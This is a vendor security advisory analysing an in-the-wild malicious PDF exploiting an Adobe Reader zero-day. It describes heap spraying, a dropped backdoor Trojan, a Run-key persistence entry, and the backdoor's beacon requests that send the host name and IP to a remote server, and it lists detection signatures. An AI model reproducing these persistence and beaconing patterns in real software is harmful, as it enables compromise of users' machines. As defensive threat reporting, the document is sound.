Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)

By

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability (CVE-2011-2462) could lead to application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning the users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability in the wild which is a specially crafted PDF file containing malicious encoded JavaScript and malicious U3D object. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

A code snippet from decoded version of JavaScript that performs heap spray and drops a malicious executable file onto the target machine can be seen below:

screenshot

The malicious PDF file when opened performs the following activity on victim machine:

  • Encoded JavaScript uses heap spraying technique to crash the application and redirect to second document page as seen below.

    screenshot

    screenshot

  • It drops a backdoor Trojan on the target machine and runs it:
    • (USER)Local Settingspretty.exe — Detected as GAV: Wisp.A_2 (Trojan)
  • Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
    • HKCUSoftwareMicrosoftWindowsCurrentVersionRunoffice = “(USER)Local Settingspretty.exe”
  • The dropped backdoor Trojan will further attempt to connect to a remote server prettyli(REMOVED)com and sends following requests:
    • GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
    • GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122

SonicWALL UTM appliance provides protection against this threat via the following signatures:

  • GAV: CVE-2011-2462.A (Exploit)
  • IPS: Malformed PDF File 14b
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.